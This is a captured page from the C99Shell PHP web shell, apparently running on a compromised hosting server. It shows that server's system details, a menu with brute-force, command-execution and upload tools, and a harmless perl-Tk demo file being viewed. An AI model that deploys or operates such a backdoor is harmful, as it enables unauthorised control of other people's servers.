!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/share/doc/perl-Tk/demos/widget_lib/   drwxr-xr-x
Free 6181.94 GB of 6263.14 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     showVars.pl (1.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |


sub showVars {

    # Create a top-level window that displays a bunch of global variable values
    # and keeps the display up-to-date even when the variables change value.
    #
    # Arguments:
    #    w    - Perl widget reference of parent.
    #    vars -    Name of variable(s) to monitor.

    $showVars->destroy if Exists($showVars);
    $showVars = shift->Toplevel();
    my $w = $showVars;
    dpos($w);
    $w->title('Variable values');
    $w->iconname('Variables');

    my $w_title = $w->Label(-text => 'Variable values:', -width => 20, -anchor, 'center',
                 -font => '-Adobe-helvetica-medium-r-normal--*-180-*-*-*-*-*-*');
    $w_title->pack(-fill => 'x');
    my $i;
    foreach $i (@_) {
    my $w_i = $w->Frame();
    my $w_i_name = $w_i->Label(-text => "$i: ");
    my $w_i_value = $w_i->Label(-textvariable => \${$i});
    $w_i_name->pack(-side => 'left');
    $w_i_value->pack(-side => 'left');
    $w_i->pack(-side => 'top', -anchor => 'w');
    }
    $w->Button(-text => 'OK', -command => [$w => 'destroy'])->
      pack(-side => 'bottom', -pady => 2);

} # end showVars


1;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0117 ]--